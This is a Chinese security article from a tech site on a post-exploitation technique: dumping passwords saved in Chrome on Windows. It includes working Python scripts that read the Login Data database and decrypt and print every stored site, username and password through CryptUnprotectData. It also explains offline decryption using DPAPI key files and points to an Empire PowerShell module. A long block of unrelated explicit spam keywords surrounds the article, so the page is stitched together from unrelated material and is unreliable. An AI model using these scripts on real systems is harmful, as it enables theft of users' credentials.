精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

滲透技巧——導出Chrome瀏覽器中保存的密碼

系統 Linux
在后滲透階段,獲得權限后需要搜集目標系統的信息。信息越全面,越有助于進一步的滲透。對于Windows系統,用戶瀏覽器往往包含有價值的信息。

[[218784]]

0x00 前言

在后滲透階段,獲得權限后需要搜集目標系統的信息。信息越全面,越有助于進一步的滲透。對于Windows系統,用戶瀏覽器往往包含有價值的信息。

在之前的文章《本地密碼查看工具LaZagne中的自定義腳本開發》曾介紹過利用LaZagne導出多個瀏覽器密碼的方法。

本文將要針對Chrome瀏覽器,介紹具體的導出原理和利用方法,解決一個實際問題: 如何導出另一系統下Chrome瀏覽器中保存的密碼?

0x01 簡介

本文將要介紹以下內容:

  • Chrome瀏覽器保存密碼的方式
  • 如何導出Chrome瀏覽器中保存的密碼
  • 常用方法的限制
  • 如何導出另一系統下Chrome瀏覽器中保存的密碼

0x02 Chrome瀏覽器保存密碼的方式

正常用戶在訪問網站時,可選擇使用Chrome瀏覽器保存登錄的用戶密碼,用于下次登錄的時候Chrome自動填寫登錄密碼,如下圖

在Chrome中可以查看保存的登錄密碼(需要提供用戶口令),如下圖

Chrome中保存的密碼先被二次加密,然后被保存在SQLite數據庫文件中,位置如下:

  1. %LocalAppData%\Google\Chrome\User Data\Default\Login Data 

實際測試:

測試系統: Win7x86

Chrome版本: 63.0.3239.132

定位SQLite數據庫文件,位于C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data

使用工具讀取數據庫文件,測試工具: SQLiteStudio

下載地址:

https://sqlitestudio.pl/index.rvt

注:

SQLiteStudio開源,特點是支持查看十六進制數據(SQLiteSpy不支持查看十六進制數據)

成功讀取數據庫文件保存的信息,但password段無法顯示,如下圖

選擇Form view,查看十六進制格式,獲得二次加密后的用戶密碼,如下圖

注:

如果Chrome正在運行,無法使用SQLiteStudio打開數據庫文件Login Data,可將該文件復制后再打開

0x03 導出Chrome瀏覽器中保存的密碼

首先,編寫程序實現讀取SQLite數據庫文件,這里選擇使用python實現

開源代碼很多,所以這里只給出一個示例

  1. from os import getenv 
  2. import sqlite3 
  3. import binascii 
  4. conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data"
  5. cursor = conn.cursor() 
  6. cursor.execute('SELECT action_url, username_value, password_value FROM logins'
  7. for result in cursor.fetchall(): 
  8.     print (binascii.b2a_hex(result[2])) 

獲得二次加密的用戶密碼,如下圖

參考Chromium開源代碼,找到Chrome做二次加密的方法: 通過Windows API CryptProtectData()實現

參考加密代碼:

https://github.com/scheib/chromium/blob/eb7e2441dd8878f733e43799ea77c2bab66816d3/chrome/browser/password_manager/password_store_win_unittest.cc#L107

CryptProtectData()的說明可參考:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

獲得關鍵信息:

(1)對應解密函數為CryptUnprotectData

參考地址:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380882(v=vs.85).aspx

(2)只有與加密數據的用戶具有相同登錄憑據的用戶才能解密數據

也就是說,只能在當前用戶的憑據下解密數據

解密的開源代碼也有很多,這里給出一個示例:

  1. from os import getenv 
  2. import sqlite3 
  3. import win32crypt 
  4. import binascii 
  5. conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data"
  6. cursor = conn.cursor() 
  7. cursor.execute('SELECT action_url, username_value, password_value FROM logins'
  8. for result in cursor.fetchall(): 
  9.     password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] 
  10.     print password 

注:

調用win32crypt.CryptUnprotectData需要安裝pywin32

下載地址:

http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/pywin32-219.win32-py2.7.exe

執行后,還原用戶密碼,如下圖

[[218785]]

注:

如果Chrome正在運行,無法查詢數據庫文件Login Data,顯示sqlite3.OperationalError: database is locked

綜上,在實際導出的過程中,如果Chrome正在運行,需要先復制數據庫文件,再嘗試解密

0x04 如何導出另一系統下Chrome瀏覽器中保存的密碼

參照CryptProtectData()的說明,地址如下:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

  • “Usually, the only user who can decrypt the data is a user with the 
  • same logon credentials as the user who encrypted the data.In addition, 
  • the encryption and decryption must be done on the same computer. “

是否可以斷定,無法在另一系統下導出Chrome瀏覽器中保存的密碼呢?

答案是否定的

Chrome密碼還原工具chromepass提供了一個特別的功能: Reading ChromePass passwords from external drive

chromepass下載地址:

http://www.nirsoft.net/utils/chromepass.html

說明如下:

  • “you can also read the passwords stored by Chrome Web browser from an 
  • external profile in your current operating system or from another 
  • external drive”

也就是說,使用chromepass能夠導出當前系統下另一用戶的Chrome密碼

操作界面如下圖

既然如此,如果獲得了另一系統下的相關配置文件,能否導出Chrome瀏覽器中保存的密碼呢?

當然可以

解密需要獲得三部分內容:

  1. 加密密鑰,位于%appdata%\Microsoft\Protect下對應sid文件夾下的文件 
  2. 數據庫文件Login Data 
  3. 用戶明文的密碼,用于解密加密密鑰 

由于chromepass程序的設計問題,以上文件需要組成特定格式,子目錄格式如下:

  1. \AppData\Local\Google\Chrome\User Data\Default\Login Data 
  2. \AppData\Roaming\Microsoft\Protect{sid}}\下保存key文件 

注:

{sid}必須同原系統的對應

eg.

  1. \AppData\Local\Google\Chrome\User Data\Default\Login Data 
  2. \AppData\Roaming\Microsoft\Protect\S-1-5-21-3453529135-4164765056-1075703908-1001\329c4147-0011-4ad6-829d-e32dcbd1bbd7 

如下圖

使用chromepass選擇該目錄,填入用戶明文密碼,如下圖

成功解密,如下圖

0x05 開源工具

解密當前系統下Chrome瀏覽器中保存的密碼,可供參考的工具:

1.命令行工具Chrome Password Dump,下載地址:

http://securityxploded.com/chrome-password-dump.php

2.powershell實現的工具:

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ChromeDump.ps1

3.python實現代碼,可供參考的開源代碼:

  1. from os import getenv 
  2. import sqlite3 
  3. import win32crypt 
  4. import binascii 
  5. conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data"
  6. cursor = conn.cursor() 
  7. cursor.execute('SELECT action_url, username_value, password_value FROM logins'
  8. for result in cursor.fetchall(): 
  9.     password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] 
  10.     if password
  11.         print 'Site: ' + result[0] 
  12.         print 'Username: ' + result[1] 
  13.         print 'Password: ' + password 
  14.     else
  15.         print "no password found" 

0x06 小結

本文介紹了導出Chrome瀏覽器密碼的原理和利用方法,成功解決一個實際問題: 通過加密密鑰文件和用戶明文密碼,能夠導出另一系統下Chrome瀏覽器中保存的密碼

如果只獲得了用戶密碼hash,能否導出呢?

 

責任編輯:武曉燕 來源: 博客園
相關推薦

2012-12-06 14:34:16

2017-02-08 14:30:08

Chrome密碼瀏覽器

2019-02-15 15:15:59

ChromeJavascriptHtml

2016-03-10 09:56:41

2017-12-04 09:39:41

瀏覽器Chrome小技巧

2025-02-13 10:28:17

數據泄露Chrome谷歌

2009-11-26 10:55:41

2010-01-28 10:13:43

2011-08-02 09:35:03

Chrome瀏覽器重定向

2015-01-21 15:45:50

斯巴達瀏覽器

2011-11-11 10:35:04

2023-08-11 07:36:10

2010-01-20 10:37:48

Chrome瀏覽器

2009-12-06 09:38:02

Chrome瀏覽器Avast

2009-03-07 09:57:41

Realplayer捆綁Chrome

2009-12-03 10:56:34

谷歌Chrome瀏覽器

2010-01-10 17:50:17

2009-09-22 09:17:46

谷歌Chrome瀏覽器

2012-08-08 09:18:47

Chrome瀏覽器

2009-07-17 09:16:20

Google Chro瀏覽器操作系統
點贊
收藏

51CTO技術棧公眾號

久久成人一区| 精品久久97| 亚洲色图19p| 国产福利一区二区三区在线观看| 国产午夜小视频| 精品在线手机视频| 欧美视频中文一区二区三区在线观看| 欧洲美女和动交zoz0z| 四虎永久在线精品免费网址| 视频一区二区三区在线| 欧美成人午夜免费视在线看片| 污污免费在线观看| 91久久久久久白丝白浆欲热蜜臀| 亚洲女人****多毛耸耸8| 精品乱码一区| 国产精品久久久久精| 99精品欧美| 久久精品亚洲一区| 野花社区视频在线观看| 成人短视频软件网站大全app| 亚洲va国产天堂va久久en| 水蜜桃一区二区三区| 欧美熟妇交换久久久久久分类 | 欧州一区二区三区| 色综合网站在线| 中文字幕日韩精品无码内射| 国产69久久| 国产成人免费在线观看| 国产精品视频不卡| 啦啦啦免费高清视频在线观看| 天天射成人网| 国产一区二区三区中文| 亚洲精品乱码久久久久久蜜桃欧美| 亚洲a∨精品一区二区三区导航| 亚洲一级片在线观看| 亚洲女人毛片| 番号在线播放| 26uuu久久天堂性欧美| av资源站久久亚洲| 一级片免费观看视频| 爽好多水快深点欧美视频| 欧美精品激情在线| 久久久久久久九九九九| 久久综合av| 中文字幕av一区二区| 欧美日韩高清丝袜| 在线日韩一区| 精品亚洲一区二区三区四区五区| 图片区偷拍区小说区| 国产精品色婷婷在线观看| 精品污污网站免费看| 91av俱乐部| 巨茎人妖videos另类| 欧美性生交xxxxx久久久| 久久成人福利视频| 黄色在线看片| 亚洲成人免费看| 性欧美大战久久久久久久| 爱情岛亚洲播放路线| 亚洲一区二区在线播放相泽| 97中文字幕在线| √8天堂资源地址中文在线| 亚洲国产一区二区三区| 日韩小视频网站| 91高清视频在线观看| 亚洲不卡一区二区三区| 91丨porny丨探花| 精品极品在线| 五月天中文字幕一区二区| 毛片在线视频播放| 亚洲人体影院| 欧美在线观看一区| 在线看免费毛片| 96sao精品免费视频观看| 91精品国产福利| 91网址在线观看精品| 88久久精品| 日韩经典第一页| 国产真人做爰视频免费| 99精品在线观看| 欧美国产激情18| 五月天综合激情网| 日本伊人色综合网| 成人性教育视频在线观看| 精品人妻一区二区三区麻豆91 | 少妇大叫太粗太大爽一区二区| 在线看成人短视频| 另类天堂视频在线观看| 日本网站免费观看| 免费av网站大全久久| 亚洲www永久成人夜色| 手机看片1024日韩| 国产免费成人在线视频| 欧美一区二区三区综合| 欧美第一视频| 91麻豆精品国产91| 极品白嫩丰满美女无套| 国产精品成人a在线观看| 色综合男人天堂| 伊人久久久久久久久久久久| 国产福利一区二区| 欧美福利一区二区三区| 国内精品不卡| 91久久久免费一区二区| 99热这里只有精品2| 精品在线99| 久久久久久久av| 在线免费观看一区二区| 不卡影院免费观看| 一区二区三区的久久的视频| 99re6在线精品视频免费播放| 欧美色综合网站| 黄色免费看视频| 午夜激情久久| 国产不卡av在线免费观看| www久久久com| 国产精品嫩草久久久久| 日本欧美黄色片| 国产午夜亚洲精品一级在线| 国产亚洲激情视频在线| 精品午夜福利视频| 国产真实乱子伦精品视频| 日本高清不卡一区二区三| 啦啦啦中文在线观看日本| 欧美日韩国产区一| 免费黄色片网站| 国产视频一区三区| 春色成人在线视频| 久草资源在线观看| 欧美日韩视频在线第一区 | 国产成人精品一区二区无码呦| 久久久久久99久久久精品网站| 久久久99精品视频| www.久久爱.com| 日韩中文字幕第一页| 免费看污视频的网站| 99久久久无码国产精品| 日本一本中文字幕| 久久久久亚洲精品中文字幕| 日韩有码片在线观看| 99re热视频| 国产视频在线观看一区二区三区| 91国视频在线| 麻豆一区二区| 久久久综合av| 亚洲男女视频在线观看| 一区二区三区中文字幕电影| 中文字幕1234区| 久久久久免费av| 成人网欧美在线视频| 人人干在线视频| 欧美日韩国产精品成人| 成人18视频免费69| 麻豆精品视频在线观看视频| 亚洲国产精品一区二区第一页 | 久久久久网站| 欧美精品欧美精品| 日韩欧美看国产| 国产亚洲精品高潮| 在线观看中文字幕码| 中文字幕在线视频一区| 亚洲天堂国产视频| 综合激情网站| 精品蜜桃一区二区三区| 伊人网在线播放| 国产一区二区激情| 中日精品一色哟哟| 国产精品国产馆在线真实露脸| 老司机午夜性大片| 亚洲综合中文| 国产乱人伦精品一区二区| 午夜欧美激情| 夜夜嗨av色综合久久久综合网 | 综合毛片免费视频| 一区二区三区精品99久久 | 欧美精品一区二区三区四区| 亚洲日本韩国在线| 中文字幕成人在线观看| 中文字幕第22页| 99精品国产一区二区青青牛奶 | 欧美xxxxx精品| 久久综合婷婷| 国产麻豆电影在线观看| 国产精品videossex| 国产精品扒开腿爽爽爽视频| 国产在线高潮| 日韩久久精品成人| 一级黄色a毛片| 亚洲国产精品自拍| 无码少妇精品一区二区免费动态| 国产一区二区三区免费| 精品少妇一区二区三区在线| 不卡日本视频| 国产精品v欧美精品v日韩精品| 中文在线中文资源| xxav国产精品美女主播| 色婷婷av一区二区三| 欧美色网一区二区| 福利一区二区三区四区| 国产精品视频你懂的| 制服丝袜av在线| 免费视频一区二区| 日本a视频在线观看| 日韩中文字幕高清在线观看| 国产三级精品在线不卡| jizz欧美| 日本国产欧美一区二区三区| 超碰在线免费公开| 国产午夜精品免费一区二区三区 | 国产原创中文在线观看| 国产精品精品| 欧美少妇一区| www.丝袜精品| 91九色综合久久| 欧美aa视频| 91精品国产免费久久久久久| 成人福利片网站| 一区三区二区视频| 香蕉av在线播放| 欧美mv日韩mv国产网站app| 亚洲婷婷久久综合| 欧美日韩一区二区三区| 麻豆changesxxx国产| 国产精品美女www爽爽爽| theav精尽人亡av| 国产电影精品久久禁18| 五月天婷婷亚洲| 奇米亚洲午夜久久精品| 国产成人亚洲精品无码h在线| 国内自拍一区| 欧美日韩中文字幕在线播放| 欧美电影免费播放| 色大师av一区二区三区| 亚洲系列另类av| 国产精品久久久久久久免费大片| 成人在线视频区| 国产自摸综合网| 欧美一区二区三区婷婷| 国产精品白嫩美女在线观看| 欧美电影网址| 日韩免费在线看| 五月激情久久| 国产成人综合久久| 欧美一区国产| 国产精品jizz在线观看麻豆| 日韩伦理三区| 国产精品三级在线| 成人久久网站| 国产一区二区在线免费视频| 欧美aaa级| 成人国产精品日本在线| 国产精品va视频| 亚洲影视九九影院在线观看| 国产日韩欧美中文在线| 91国产在线播放| 亚洲国产中文在线| 国产精品一区免费观看| 黄色免费大全亚洲| 精品在线一区| 国产精品亚洲片在线播放| 日本午夜精品一区二区三区| 欧美艳星介绍134位艳星| 亚洲精品国产一区| 88国产精品视频一区二区三区| 老司机午夜网站| 国产精品99免费看| 国产原创中文在线观看| 天堂一区二区在线| 深夜黄色小视频| 国产精品一二三区在线| 男女性杂交内射妇女bbwxz| 91毛片在线观看| 亚洲精品成人av久久| 中文字幕亚洲一区二区va在线| 国产一区二区精彩视频| 夜夜嗨av一区二区三区中文字幕| 91看片在线播放| 在线精品亚洲一区二区不卡| 97超碰人人模人人人爽人人爱| 日韩一卡二卡三卡国产欧美| 少妇又色又爽又黄的视频| 亚洲男人的天堂在线| 日韩av中文| 欧美极品欧美精品欧美视频 | 国产伦视频一区二区三区| 羞羞答答一区二区| 一区二区精品免费视频| 国产综合网站| 久久久久免费精品| 国产一区二区三区免费看| 日韩片在线观看| 日韩一区中文字幕| www.伊人久久| 日韩亚洲国产中文字幕欧美| 青青操视频在线| 欧美精品亚州精品| 成人精品动漫| 超碰97国产在线| 日韩中字在线| 青青草原av在线播放| 国产原创一区二区| 国产美女喷水视频| 亚洲精品视频在线看| 国产第一页在线观看| 精品日产卡一卡二卡麻豆| 成人福利在线| 性欧美长视频免费观看不卡| 色综合.com| 欧美日韩一区在线播放| 欧美日韩1区2区3区| 在线免费观看av的网站| 91在线视频在线| 免费在线黄色网| 欧美午夜一区二区三区免费大片| 欧美亚洲精品在线观看| 久久亚洲综合国产精品99麻豆精品福利| 无遮挡爽大片在线观看视频| 99久久免费国| 天天射成人网| 男女污污的视频| 91免费精品国自产拍在线不卡 | 色综合久久综合| 少妇人妻精品一区二区三区| 久久精品国产电影| 精品九九久久| 日韩一区免费观看| 麻豆精品网站| 亚洲精品视频大全| 欧美日韩国产精品一区| 免费av网站在线播放| 久久99久久久久久久噜噜| 91精品网站在线观看| 性欧美大战久久久久久久免费观看| 国产精品色网| 尤物网站在线观看| 亚洲国产精品一区二区www在线| 国产深喉视频一区二区| 色偷偷9999www| 国产精品xxx| 亚洲三区在线| 久久成人精品无人区| 精品伦精品一区二区三区视频密桃| 色成人在线视频| 国产私人尤物无码不卡| 国产成人久久久精品一区| 在线看成人短视频| 国产一区视频免费观看| 99精品欧美一区| 成年人视频在线免费看| 日韩精品免费在线视频观看| 天堂电影一区| 欧美在线一二三区| 蜜臀91精品一区二区三区 | 国产精品久久久久久av福利| 国产乱码精品一区二区亚洲| 精品国产成人av在线免| 国产亚洲精品bt天堂精选| 中文字幕777| www日韩欧美| 白嫩白嫩国产精品| 美女日批免费视频| 久久精品免费在线观看| 欧美性受xxx黑人xyx性爽| 三级精品视频久久久久| 蜜桃精品视频| 大j8黑人w巨大888a片| 国产三级一区二区三区| 亚洲综合精品国产一区二区三区 | 精品午夜福利视频| 国产丝袜一区视频在线观看| 成人免费网站www网站高清| 在线播放豆国产99亚洲| 国产福利91精品一区| 国产福利拍拍拍| 亚洲最大在线视频| 久久久久久久久成人| 国产a级片网站| 日本一区二区三区在线不卡| 国内精品偷拍视频| 欧美一级黄色网| 久久一区二区中文字幕| 黑人玩弄人妻一区二区三区| 色综合咪咪久久| 国产成人午夜| 欧美不卡1区2区3区| 久久精品国产第一区二区三区| 九九视频免费在线观看| 亚洲男人天堂2019| 国产日韩在线观看视频| 人妻精品无码一区二区三区| 国产嫩草影院久久久久| 亚洲欧美黄色片| 国产日本欧美一区二区三区| 韩国在线一区| 东京热无码av男人的天堂| 日韩欧美一级二级三级| 怡红院成人在线| 蜜臀av色欲a片无码精品一区 | 久久精品亚洲无码| 夜夜嗨av一区二区三区四区|